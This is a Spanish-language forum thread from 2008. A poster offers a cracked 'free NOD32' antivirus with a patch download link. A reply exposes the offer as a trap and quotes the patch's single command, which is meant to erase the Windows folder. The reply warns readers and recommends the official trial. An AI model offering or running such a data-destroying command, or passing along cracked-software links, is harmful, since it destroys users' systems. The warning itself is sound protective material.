Virus/Antivirus - Nod 32 Gratis

 
Vista:

Nod 32 Gratis

Publicado por supadre (1 intervención) el 16/10/2008 05:58:35
hola miren les dejo un antivirus el no32 con parche primero instalan el nod y luego el parche dejo el link

DownloadLink: http://rapidshare.com/files/154454540/nod32.zip
----------------------------------------------------------------------------------------------
Valora esta pregunta
Me gusta: Está pregunta es útil y esta claraNo me gusta: Está pregunta no esta clara o no es útil
0
Responder

RE:Nod 32 Gratis (o "borra Windows")

Publicado por keyser.aacm (49 intervenciones) el 16/10/2008 18:20:59
Este es un foro que necesita aportes y no de bromas estúpidas como la tuya.
Dejo al lector avisado de que el "NOD32 gratis" es una instalación comprimida (inestable) alterada, trae unos subprogramas misteriosos (¿tendrán software malicioso oculto?) que sirven "para engañar a ESET (la empresa de NOD32)". Aparte incluye un "parche". Pero atentos: dicho parche es un archivo cmd con una sola instrucción:

erase C:WINDOWS q

Para el que no sepa, significa "borra todo el contenido de la carpeta Windows y no me preguntes si estoy seguro de mi decisión". Afortunadamente el iluminado que inició este hilo escribió mal el comando, pues donde dice " q" debe decir " /q", por tanto, antes de eliminar la carpeta pregunta al usuario si está seguro.

Resumiendo: El autor de este hilo ofrece un "NOD32 gratis" que es menos que una pésima y peligrosa instalación manipulada y como corresponde también incluye el "parche", que nada más borra muchísimos archivos de Windows. Casi nada.

Bajen la versión de prueba oficial de NOD32, al menos se aseguran de que otros no han manipulado el instalador. Luego busquen un software que introduzca nombre y contraseña (o sea, no bajen cracks u otros que alteren archivos del antivirus).

Lector, quedas advertido.
Valora esta respuesta
Me gusta: Está respuesta es útil y esta claraNo me gusta: Está respuesta no esta clara o no es útil
0
Comentar

RE:Nod 32 Gratis (o

Publicado por manuels (1 intervención) el 08/11/2008 19:24:12
gcguscbhjbscajcsjk
Valora esta respuesta
Me gusta: Está respuesta es útil y esta claraNo me gusta: Está respuesta no esta clara o no es útil
0
Comentar